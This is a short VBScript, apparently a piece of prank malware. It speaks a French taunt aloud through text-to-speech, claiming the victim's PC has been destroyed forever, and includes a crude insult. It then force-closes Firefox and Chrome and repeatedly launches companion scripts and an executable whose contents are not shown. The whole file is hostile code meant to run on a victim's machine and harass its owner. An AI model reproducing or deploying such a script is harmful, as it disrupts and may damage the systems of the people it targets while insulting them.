createobject ("SAPI.SpVoice").Speak "coucou, je suis juste la petite voix qui te dit que le 18 25 vient de detruire ton pc et ce a tout jamais. amuse toi bien a le reparer fils de viol, très content. dedi au rai du 18 25"
set variable=CreateObject("WScript.Shell")
variable.Run ("taskkill /f /IM firefox.exe")
variable.Run ("taskkill /f /IM chrome.exe")
variable.Run ("extension5.vbs")
variable.Run ("extension6.exe")
variable.Run ("extension3.vbs")
wscript.sleep 150
variable.Run ("extension4.bat")
wscript.sleep 50
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")
variable.Run ("extension3.vbs")